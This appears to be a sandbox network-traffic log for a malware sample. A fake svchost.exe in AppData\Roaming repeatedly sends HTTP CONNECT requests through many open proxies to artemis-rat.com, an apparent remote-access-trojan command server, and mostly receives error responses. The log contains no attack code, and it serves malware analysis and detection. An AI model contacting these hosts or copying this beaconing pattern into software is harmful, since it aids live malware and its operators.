Mar 9, 2024 13:14:34.406374931 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.560796022 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:34 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3179	192.168.2.5	58763	147.124.212.31	13276	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.413062096 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3180	192.168.2.5	60099	103.109.59.209	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.413357973 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3181	192.168.2.5	60153	185.110.190.99	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.415365934 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3182	192.168.2.5	59796	199.58.185.9	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.417327881 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3183	192.168.2.5	59909	69.167.169.46	12903	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.417714119 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3184	192.168.2.5	58853	51.75.126.150	21803	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.467216015 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.646223068 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3185	192.168.2.5	60271	104.16.106.154	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.498074055 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.652405977 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:34 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3186	192.168.2.5	58828	45.11.95.166	6016	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.522089958 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.120294094 CET	39	IN	HTTP/1.0 200 Connection established

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3187	192.168.2.5	60313	97.74.233.206	40591	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.522404909 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.020266056 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.677407980 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.761177063 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3188	192.168.2.5	60158	94.130.94.45	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.535161972 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3189	192.168.2.5	60156	43.133.136.208	8800	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.542807102 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3190	192.168.2.5	59963	192.163.202.88	39782	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.542859077 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.145730019 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.646456957 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.646220922 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.442964077 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3191	192.168.2.5	58815	103.158.253.105	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.544338942 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3192	192.168.2.5	60272	38.162.23.127	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.547305107 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.029032946 CET	111	IN	HTTP/1.1 407 Proxy Authentication Required Proxy-Authenticate: Basic realm="" Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 Data Ascii: Proxy Authentication Required

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3193	192.168.2.5	58706	103.75.96.70	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.548815966 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3194	192.168.2.5	60051	180.250.159.49	4153	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.549079895 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.833528042 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3195	192.168.2.5	59938	162.241.66.135	51535	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.551374912 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3196	192.168.2.5	60276	94.131.60.199	58378	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.551585913 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.773355961 CET	1260	IN	HTTP/1.1 403 Forbidden Server: squid/6.0.0-20220501-re899e0c27 Mime-Version: 1.0 Date: Sat, 09 Mar 2024 12:14:34 GMT Content-Type: text/html;charset=utf-8 Content-Length: 3670 X-Squid-Error: ERR_ACCESS_DENIED 0 Vary: Accept-Language Content-Language: en Cache-Status: ezproxies.com Via: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27) Connection: keep-alive Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2022 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. // Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License// Page basics / {font-family: verdana, sans-seri

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3197	192.168.2.5	55305	162.241.158.204	52980	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.555349112 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.145998955 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3198	192.168.2.5	59956	162.214.191.59	58275	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.564816952 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3199	192.168.2.5	60155	43.231.22.228	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.571130991 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.985397100 CET	343	IN	HTTP/1.1 400 Bad Request Server: nginx/1.14.0 (Ubuntu) Date: Sat, 09 Mar 2024 12:14:34 GMT Content-Type: text/html Content-Length: 182 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3200	192.168.2.5	60300	198.37.57.112	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.572832108 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.808705091 CET	503	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Sat, 09 Mar 2024 12:14:33 GMT Connection: close Content-Length: 324 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 20 2d 20 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 55 52 4c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request - Invalid URL</h2><hr><p>HTTP Error 400. The request URL is invalid.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3201	192.168.2.5	55341	198.49.68.80	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.592269897 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.546871901 CET	536	IN	HTTP/1.1 500 Internal Server Error Date: Sat, 09 Mar 2024 12:14:35 GMT Server: Apache Content-Length: 663 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 64 66 67 68 68 73 64 66 67 68 40 61 73 64 66 2e 63 6f 6d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at dfghhsdfgh@asdf.com to inform them of the time this e
Mar 9, 2024 13:14:35.547314882 CET	303	IN	Data Raw: 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 Data Ascii: rror occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><p>Additionally, a 500 Internal Server Errorerror was encountered while trying to use

